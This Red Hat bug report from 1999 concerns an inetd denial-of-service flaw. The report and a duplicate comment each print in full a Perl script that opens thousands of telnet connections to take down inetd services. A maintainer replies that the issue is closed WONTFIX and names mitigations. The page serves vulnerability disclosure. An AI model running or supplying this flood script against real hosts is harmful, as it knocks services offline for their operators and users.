4005 – inetd D-O-S exploit

Bug 4005 - inetd D-O-S exploit

Summary: inetd D-O-S exploit

Keywords:
Status:	CLOSED WONTFIX
Alias:	None
Product:	Red Hat Linux
Classification:	Retired
Component:	netkit-base
Sub Component:
Version:	6.0
Hardware:	i386
OS:	Linux
Priority:	high
Severity:	high
Target Milestone:	---
Assignee:	Cristian Gafton
QA Contact:
Docs Contact:
URL:
Whiteboard:
Duplicates (1):	4004 (view as bug list)
Depends On:
Blocks:
TreeView+	depends on / blocked

Reported:	1999-07-12 22:40 UTC by jjuarez
Modified:	2008-05-01 15:37 UTC (History)
CC List:	1 user (show)
Fixed In Version:
Doc Type:	Bug Fix
Doc Text:
Clone Of:
Environment:
Last Closed:	1999-07-28 07:53:42 UTC
Embargoed:

Attachments	(Terms of Use)

Description jjuarez 1999-07-12 22:40:49 UTC

#!/usr/bin/perl
# Author: Jesus A. Juarez
#         Jul 1999
# e-mail: chuby
# The Xploit attack to services under inetd daemon on the
# Linux  Box's, this cause the suspend of the services.
# The problem is on the inetd, telnet, ftp & sendmail, etc;
# daemon's, because this programs do not limit the number of
# calls by client. This causes that the service requested
# became down.
# Use it under your own risk.
# The TCP-WRAPPERS don't Fix this problem.
# Sintax:
#               DoS-TFS.pl <hostname> <port> <enter>
#               DoS-Telnet, FTP, Sendmail, etc.
# This code has beed tested from Linux to Linux Box's whith
# Perl  installed, I think'  that it run the same way on
# some Unix's or Windows System to damage some Linux Box's.
use Net::Telnet;
for ($i=0;$i<5000;$i++)
{
  $obj=Net::Telnet->new( Host => "$ARGV[0]",Port >
"$ARGV[1]");
  my $cmd = ".";
  $obj->print("$cmd");
  $obj->close;
}
#this problem will not be published.
# please notify me, when fix it. :)

Comment 1 Bill Nottingham 1999-07-13 14:22:59 UTC

*** Bug 4004 has been marked as a duplicate of this bug. ***

#!/usr/bin/perl
# Author: Jesus A. Juarez
#         Jul 1999
# e-mail: chuby
# The Xploit attack to services under inetd daemon on the
# Linux  Box's, this cause the suspend of the services.
# The problem is on the inetd, telnet, ftp & sendmail, etc;
# daemon's, because this programs do not limit the number of
# calls by client. This causes that the service requested
# became down.
# Use it under your own risk.
# The TCP-WRAPPERS don't Fix this problem.
# Sintax:
#               DoS-TFS.pl <hostname> <port> <enter>
#               DoS-Telnet, FTP, Sendmail, etc.
# This code has beed tested from Linux to Linux Box's whith
# Perl  installed, I think'  that it run the same way on
# some Unix's or Windows System to damage some Linux Box's.
use Net::Telnet;
for ($i=0;$i<5000;$i++)
{
  $obj=Net::Telnet->new( Host => "$ARGV[0]",Port >
"$ARGV[1]");
  my $cmd = ".";
  $obj->print("$cmd");
  $obj->close;
}
#this problem will not be published.
# please notify me, when fix it. :)

Comment 2 Cristian Gafton 1999-07-28 07:53:59 UTC

inetd will shut down the services that are being over-used or come
under heavy network activity. One can use the wait/nowait.N to limit
the number of spawns for that service to N per second, but that is not
a effective protection against these types of attacks.

The kernel SYn cookies will also help here, but the only effective way
of protection is firewalling off the attacker.

Note You need to log in before you can comment on or make changes to this bug.